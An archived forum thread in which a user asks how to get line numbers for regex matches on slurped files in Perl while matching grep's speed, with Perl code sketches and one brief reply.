
perl vs Unix grep

Hi all,
I've been working on a problem that I thought might be of interest: I'm
trying to replace some Korn shell scripts that search source code files with
Perl scripts, to gain certain features such as:

More powerful regular expressions available in Perl
The ability to print lines before and after matches (GNU grep supports this, but it is not available on our Digital Unix and AIX platforms)
Searches that are case insensitive by default (yes, I know this can be done with grep, but the shell scripts that use grep don't do this)

We're talking about approximately 5000 files spread over 15 directories. To date
it has proven quite difficult (for me) to match the performance of the Korn
shell scripts with Perl scripts while still obtaining the line number and
context information needed. The crux of the problem is that I have seen the
best performance from Perl when I match with the /g modifier on a string
holding the current file's slurped contents:

local $/;                             # undef the record separator to slurp
my $curStr = <FH>;                    # read the whole file as one string
while ($curStr =~ /$compiledRegex/g)
{
    # write matches to file for eventual paging
}
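For reference, a self-contained version of that loop might look like the sketch below. The file name and pattern are hypothetical stand-ins, and the @- array is used to record each match's starting offset for later use:

#!/usr/bin/perl
use strict;
use warnings;

my $file          = 'src/example.c';    # hypothetical file name
my $compiledRegex = qr/TODO/i;          # hypothetical pattern

open my $fh, '<', $file or die "Can't open $file: $!";
my $curStr = do { local $/; <$fh> };    # slurp the whole file
close $fh;

while ($curStr =~ /$compiledRegex/g) {
    my $offset = $-[0];                 # byte offset where this match starts
    print "match at offset $offset\n";  # stand-in for writing to the paging file
}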

This works well, except that when each match is found I need the line number
on which it occurs. As far as I can tell from reading and research, there is
no variable that holds this information, since I am not reading from the file
at this point. I can get the information in other ways, such as:

1. Reading each file a line at a time, testing for a match, and keeping a line counter or using $NR.
2. Reading the file into an array and processing it a line at a time.
3. Creating index files for the source files that store line offsets, and using them with the slurp method in the paragraph above.
4. Creating an in-memory index for each file that contains a match, and using it for subsequent matches in that file.

Options 1, 2, and 4 suffer performance degradation relative to Unix grep.
Option 3 provides good performance and is the method I am currently using, but
it requires creating and maintaining index files (a sketch of the in-memory
variant, option 4, follows below). I was wondering if I could tie a scalar to
a file and use the slurping loop above; then perhaps $NR and $. would contain
the current line number, since the file would be read as the loop is
traversed. Any other ideas would be welcome.
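For what it's worth, here is a minimal sketch of option 4, using the same hypothetical file name and pattern as in the earlier sketch: an in-memory index of line-start offsets is built the first time a file matches, and each match offset is binary-searched against it:

#!/usr/bin/perl
use strict;
use warnings;

my $file          = 'src/example.c';   # hypothetical file name
my $compiledRegex = qr/TODO/i;         # hypothetical pattern

open my $fh, '<', $file or die "Can't open $file: $!";
my $curStr = do { local $/; <$fh> };   # slurp the whole file
close $fh;

my @starts;                            # line-start offsets, built only if needed
while ($curStr =~ /$compiledRegex/g) {
    @starts = line_starts($curStr) unless @starts;
    my $line = offset_to_line(\@starts, $-[0]);
    print "$file:$line\n";             # stand-in for writing to the paging file
}

# Return the byte offset at which every line begins.
sub line_starts {
    my ($str) = @_;                    # copy, so pos() on the caller's string is untouched
    my @s = (0);
    push @s, pos($str) while $str =~ /\n/g;
    return @s;
}

# Binary-search the offset list for the last line start <= $off.
sub offset_to_line {
    my ($starts, $off) = @_;
    my ($lo, $hi) = (0, $#$starts);
    while ($lo < $hi) {
        my $mid = int(($lo + $hi + 1) / 2);
        if ($starts->[$mid] <= $off) { $lo = $mid } else { $hi = $mid - 1 }
    }
    return $lo + 1;                    # line numbers are 1-based
}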

Al
Jul 19 '05 #1
1 reply, 17,558 views
Hello Al Belden,

I have had a similar problem: getting the index number of the matching
element when searching for elements in an array. It was fruitless. I used a
hash map, but that was a burden on the system. In another possible
implementation, I used a separate indexCount variable over the array,
reinitialized every time; a sketch of that approach follows.
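A minimal sketch of that counter approach (the array contents and pattern are hypothetical):

#!/usr/bin/perl
use strict;
use warnings;

my @elements   = ('foo', 'bar baz', 'quux');  # hypothetical array to search
my $pattern    = qr/bar/;                     # hypothetical pattern
my $indexCount = 0;                           # reinitialized before every search

for my $elem (@elements) {
    print "match at index $indexCount\n" if $elem =~ $pattern;
    $indexCount++;
}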

That's it.
Perl is a language to make things work at any cost. All the best.
Thanks.
Giridhar Nandigam
"Al Belden" <ab*****@comcast.net> wrote in message news:<Bv********************@comcast.com>...

Jul 19 '05 #2

